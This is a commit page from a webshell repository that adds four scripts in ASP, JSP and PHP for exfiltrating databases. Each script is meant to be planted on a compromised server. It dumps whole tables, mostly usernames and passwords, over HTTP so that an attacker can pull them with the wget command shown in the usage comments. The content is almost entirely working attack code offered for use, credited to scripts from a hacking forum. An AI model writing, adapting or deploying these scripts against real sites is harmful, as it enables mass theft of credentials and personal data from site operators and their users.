PenTest/webshell
1
0
Fork 0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00
Code Issues Projects Releases Wiki Activity

drag database with wget download

Browse Source
This commit is contained in:
tennc
2014-05-29 08:22:20 +08:00
parent 79c0b09b43
commit c04d236324
4 changed files with 287 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

43
drag/asp wget drag database.asp.txt Normal file
View File

@@ -0,0 +1,43 @@
<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001" %>'这里改编码方式
<%
'用法:如果把本程序放在[url]http://www.xxx.com/sql.asp[/url]可以wget [url]http://www.xxx.com/sql.asp[/url] -O x.csv 来直接拖库
        Response.Buffer = True
        Server.ScriptTimeout = 2147483647
 
        str="Driver={Sql Server};Server=192.168.1.5;Uid=mssql库名;Pwd=mssql密码;Database=库名" 这里是连接字符串
        Set Conn=Server.CreateObject("Adodb.connection")
        Conn.Open str
 
        Set Rs = Server.Createobject("Adodb.Recordset") 
 
        Sqlstr="SELECT  * FROM 库名.dbo.[表名]"  '这里是导哪个库哪个表的语句
        Rs.Open Sqlstr,Conn,3,3 
 
        If(Rs.Fields.Count > 0)Then
                For I = 0 To Rs.Fields.Count - 1
                        Response.Write Rs.Fields(i).Name & "        "
                Next
                Response.Write(vbNewLine)
 
                For I = 1 To Rs.RecordCount
                                         
                        If(I Mod 100 = 0)Then
                                Response.Flush
                        End If
 
                        For J = 0 To Rs.Fields.Count - 1
                                Response.Write Rs(J) & "        "
                        Next
 
                        Response.Write(vbNewLine)
                         
                        Rs.MoveNext
                Next
        End If
 
        Rs.Close 
        Conn.Close
        If(Err <> 0)Then Response.Write(Err.Description)
        Set Rs = Nothing 
        Set Conn = Nothing 
%>

85
drag/jsp wget drag database.jsp.txt Normal file
View File

@@ -0,0 +1,85 @@
<%@ page contentType="text/html; charset=utf-8" %>
<%@ page language="java" %>
<%@ page import="java.sql.*" %>
<%
//author: By Gavin
//Usage: wget "http://xxx.com/wget_db.jsp?sn=0&en=5000000&ln=50000" -O gavin.sql
out.clear();
//分段每次limit查询出来的条数,根据实际情况调整默认为2w
int MAX_LIMIT_NUM = 20000;
//最大缓存条数,防止占用过多内存,根据每条数据大小调整
int MAX_CACHE_NUM = 5000;
//驱动程序名
String driverName="com.mysql.jdbc.Driver";
// 数据库地址
String dbAddress = "127.0.0.1:3306";
//数据库用户名
String userName="root";
//密码
String userPasswd="root";
//数据库名
String dbName="DBName";
// 查询字段
String columns[] = "username,password".split(",");
//表名
String tableName="table_name";
// 接受参数
int startNum = Integer.valueOf(request.getParameter("sn")); //接收起始条数
int endNum = Integer.valueOf(request.getParameter("en")); //接收结束条数
String ln = request.getParameter("ln");
if (ln != null && ln != "") MAX_LIMIT_NUM = Integer.valueOf(ln); //接收每次分段查询的条数
int gavin_downNum = endNum - startNum; //计算总下载条数
if (endNum < MAX_LIMIT_NUM) MAX_LIMIT_NUM = endNum;
int multiple = gavin_downNum/MAX_LIMIT_NUM;
int complement = gavin_downNum%MAX_LIMIT_NUM;
// 连接数据库
String url="jdbc:mysql://"+dbAddress+"/"+dbName+"?user="+userName+"&password="+userPasswd;
Class.forName(driverName).newInstance();
Connection connection=DriverManager.getConnection(url);
Statement statement = connection.createStatement();
// 拼装前半部分sql
String sql = "SELECT ";
for(int i=0;i<columns.length;i++){
if(i == (columns.length-1)){
sql += columns[i];
} else {
sql += columns[i] + ",";
}
}
sql += " FROM " + tableName + " ";
int num = 1;
for(int i=0;i<multiple;i++) {
int newStartNum = i*MAX_LIMIT_NUM+startNum;
if(i == (multiple-1)) MAX_LIMIT_NUM += complement;
String newSql = sql + " limit " + newStartNum + "," + MAX_LIMIT_NUM;
java.sql.ResultSet rs = statement.executeQuery(newSql);
//获得数据结果集合
//ResultSetMetaData rmeta = rs.getMetaData();
while(rs.next()) {
num ++;
for(int j=1;j<=columns.length;j++){
if(j == columns.length){
out.println(rs.getString(j));
} else {
out.print(rs.getString(j)+"-->");
}
}
if (num >= MAX_CACHE_NUM) {
out.flush();
num = 0;
}
}
rs.close();
}
statement.close();
connection.close();
%>

96
drag/php wget drag database.php 2.txt Normal file
View File

@@ -0,0 +1,96 @@
<?php
//使用方法: wget "http://localhost/getsql.php?t='xiaomi_com'&f=username,password,email&s=0&e=2000000$l=5000" -O data.txt
//借鉴了 LCX Gavin 2大前辈的脚本.
// LCX [url=https://www.t00ls.net/thread-26740-1-1.html]https://www.t00ls.net/thread-26740-1-1.html[/url]
// Gavin [url=https://www.t00ls.net/thread-26791-1-1.html]https://www.t00ls.net/thread-26791-1-1.html[/url]
//
error_reporting(0);
ignore_user_abort();
set_time_limit(0);
ob_clean();
define('DB_HOST', '127.0.0.1');
define('DB_PORT','3306');
define('DB_NAME', 'thinkphp');
define('DB_USER', 'root');
define('DB_PASS', 'wanan');
define('DB_CHAR', 'utf8');
$type=class_exists('PDO')?'PDO':'MYSQL';
$table=$_GET['t']?$_GET['t']:die('表名必须!'); //表名 必须 t
$limit_start=$_GET['s']?intval($_GET['s']):0; //开始条数 可选 s 默认为0
$limit_end=$_GET['e']?intval($_GET['e']):0; //结束条数 可选 e 默认为所有
$limit_length=$_GET['l']?intval($_GET['l']):5000; //分段条数 可选 l 默认为5000
$filed=$_GET['f']?$_GET['f']:'*'; //字段名 可选 f 用,分割没有则为全部字段
if($type=='PDO'){
$dsn='mysql:host='.DB_HOST.';port='.DB_PORT.';dbname='.DB_NAME;
$options = array(
PDO::MYSQL_ATTR_INIT_COMMAND => 'SET NAMES '.DB_CHAR,
);
try{
$dbh = new PDO($dsn,DB_USER,DB_PASS,$options);
}catch (PDOException $e) {
die('PDO ERROR!');
}
$sql='SELECT COUNT(-1) FROM `'.$table.'`;';
$do=$dbh->query($sql);
if($do){
$count=$do->fetch();
}else{
die('PDO COUNT ERROR');
}
$limit_end=($limit_end)?$limit_end:$count[0];
$limit_end=$limit_end-$limit_start;
$limit_length=$limit_end>$limit_length?$limit_length:$limit_end;
$section=ceil($limit_end/$limit_length);
if (ob_get_level() == 0){
ob_start();
}else{
die('PDO ERROR');
}
for($i=0;$i<$section;$i++){
$sql='SELECT '.$filed.' FROM '.$table.' LIMIT '.($limit_start+1+$i*$limit_length).','.$limit_length.';';
$s=$dbh->query($sql);
$arr=$s->fetchALL(PDO::FETCH_ASSOC);
foreach ($arr as $value) {
echo(implode(' ', $value)."\n");
}
ob_end_flush();
}
}else{
$link=mysql_connect(DB_HOST.':'.DB_PASS,DB_USER,DB_PASS);
if($link){
mysql_select_db(DB_NAME,$link);
mysql_query('SET NAMES '.DB_CHAR);
$sql='SELECT COUNT(-1) FROM `'.$table.'`;';
$count=mysql_fetch_array(mysql_query($sql));
$limit_end=($limit_end)?$limit_end:$count[0];
$limit_end=$limit_end-$limit_start;
$limit_length=$limit_end>$limit_length?$limit_length:$limit_end;
$section=ceil($limit_end/$limit_length);
if (ob_get_level() == 0){
ob_start();
}else{
die('MYSQL ERROR');
}
for($i=0;$i<$section;$i++){
$sql='SELECT '.$filed.' FROM '.$table.' LIMIT '.($limit_start+1+$i*$limit_length).','.$limit_length.';';
$a=mysql_query($sql);
if($b=mysql_fetch_row($a)){
do{
echo(implode(' ', $b)."\n");
}while($b=mysql_fetch_row($a));
}
ob_end_flush();
}
}else{
die('MYSQL ERROR!');
}
}
?>

63
drag/php wget drag database.php.txt Normal file
View File

@@ -0,0 +1,63 @@
<?php
//author: By Gavin
//Usage: wget "http://xxx.com/wget_sql.php?sn=0&en=5000000&ln=50000" -O gavin.sql
error_reporting(0);
ignore_user_abort();
set_time_limit(0);
ob_clean();
//配置数据库信息
$DB_Server="127.0.0.1:3306";
$DB_User="root";
$DB_Pass="root";
$DB_Name="DBName";
//分段每次limit查询出来的条数,根据实际情况调整默认为2w
$max_limit_num = 20000;
//最大缓存条数,防止占用过多内存,根据每条数据大小调整
$max_cache_num = 5000;
$gavin_start_num = intval($_GET['sn']); //接收起始条数
$gavin_end_num = intval($_GET['en']); //接收结束条数
if (intval($_GET['ln'])) $max_limit_num = intval($_GET['ln']); //接收每次分段查询的条数
$gavin_down_num = intval($gavin_end_num - $gavin_start_num); //计算总下载条数
if ($gavin_end_num < $max_limit_num) $max_limit_num = $gavin_end_num;
$beishu = intval($gavin_down_num/$max_limit_num);
$yushu = intval($gavin_down_num%$max_limit_num);
$conn=@mysql_connect($DB_Server,$DB_User,$DB_Pass);
if ($conn==FALSE) {
echo "数据库连接出错!<br>";
exit();
}
if (@mysql_select_db($DB_Name,$conn)==FALSE) {
echo "打开数据库:".$DB_Name." 失败!";
exit();
}
mysql_query("set names 'utf8'");
$num = 1;
$out_put_str = '';
if (ob_get_level() == 0) ob_start();
for ($i=0;$i<$beishu;$i++){
$new_start_num = $i*$max_limit_num+$gavin_start_num;
if ($i == ($beishu-1)) $max_limit_num += $yushu;
$sql = "select username,password from `table_name` limit ".$new_start_num.",".$max_limit_num; //配置SQL语句
$res = mysql_query($sql) or die(mysql_error());
while($result = mysql_fetch_array($res))
{
$num ++;
$out_put_str = $result["username"]."-->".$result["password"]."\n"; //格式化脱出的数据,根据SQL中的字段调整
if ($num >= $max_cache_num){
@ob_end_flush();
$num = 0;
}
echo $out_put_str;
// unset($out_put_str);
}
}
?>